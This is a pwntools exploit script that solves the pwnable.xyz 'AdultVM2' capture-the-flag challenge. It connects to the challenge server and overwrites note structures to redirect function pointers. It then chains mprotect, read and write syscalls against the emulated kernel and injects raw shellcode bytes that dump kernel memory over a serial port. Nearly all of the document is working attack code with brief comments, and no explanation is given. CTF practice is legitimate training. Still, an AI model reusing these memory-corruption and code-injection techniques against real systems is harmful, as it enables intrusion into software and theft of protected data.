[pwnable.xyz] AdultVM2

from pwn import *
context.log_level = "debug"

#p = process("./userland")
p = remote("svc.pwnable.xyz", 30048)

ru = lambda a : p.recvuntil(a)
snd = lambda a : p.send(a)
snl = lambda a : p.sendline(a)

def show(idx):
    ru(b"Exit\n")
    snl(b"2")
    ru(b": ")
    snl(str(idx).encode())

def edit(idx, data):
    ru(b"Exit\n")
    snl(b"1")
    ru(b": ")
    snl(str(idx).encode())
    ru(b": ")
    snd(data)


syscall = 0x0004000338
read = 0x04000400
note = 0x004100380


# 10 = mprotect

for i in range(9):
    edit(i, (b"A" * 0x38) + b"\n")

# notes[id].show(notes[id].id, notes[id].note, notes[id].size, notes[id].serial);

pay = b"A" * 8
pay += p64(0)
pay += p64(note)
pay += p64(0x78)
pay += p64(0)
pay += p64(read)
pay += b"\n"
edit(9, pay)
show(0)

# set prot
pay = p64(10)
pay += p64(0xFFFFFFFF81000000)
pay += p64(0x1000)
pay += p64(7)
pay += p64(syscall)
# ====== read
pay += p64(0)
pay += p64(0xFFFFFFFF8100013E)
pay += p64(13)
pay += p64(0)
pay += p64(read)

# ====== write
pay += p64(11)
pay += p64(1)
pay += p64(0xFFFFFFFF81000000 + 0x5000)
pay += p64(0x50)
pay += p64(syscall)

snd(pay)
sleep(0.1)

"""
seg000:FFFFFFFF810000F9 66 89 D1                          mov     cx, dx
seg000:FFFFFFFF810000FC 48 89 C8                          mov     rax, rcx
seg000:FFFFFFFF810000FF 66 BA F8 03                       mov     dx, 3F8h
seg000:FFFFFFFF81000103 F3 6E                             rep outsb
seg000:FFFFFFFF81000105 CF                                iret
"""

show(0)
show(1)
snd(b"\x66\x89\xD1\x48\x89\xC8\x66\xBA\xF8\x03\xF3\x6E\xCF")
show(2)

p.interactive()